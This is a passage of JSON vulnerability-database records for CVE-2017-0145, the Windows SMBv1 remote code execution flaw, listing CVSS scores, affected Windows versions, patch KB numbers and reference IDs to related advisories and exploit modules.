"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit 
Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T20:49:50", "differentElements": ["msAffectedSoftware"], "edition": 39}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-12T22:47:20", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB3210720", "KB3205401", "KB4013198", "KB4012216", "KB3205409", "KB3212646", "KB3213986", "KB4012213", "KBMS16-110, 3187754", "KB4012212", "KB4012598", "KB4012606", "KB4012217", "KB4013429", "KB4012214", "KB3177186", "KB3210721", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T22:47:20", "differentElements": ["msAffectedSoftware"], "edition": 40}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A 
remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-13T00:46:29", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4012214", "KB4012212", "KB3210720", "KB4013198", "KB3212646", "KB3177186", "KB4012216", "KB3205401", "KB4014077", "KB4013429", "KB4012213", "KB3205409", "KB4012598", "KB4012606", "KB4012217", "KB3213986", "KB4012215", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit 
Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T00:46:29", "differentElements": ["msAffectedSoftware"], "edition": 41}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", 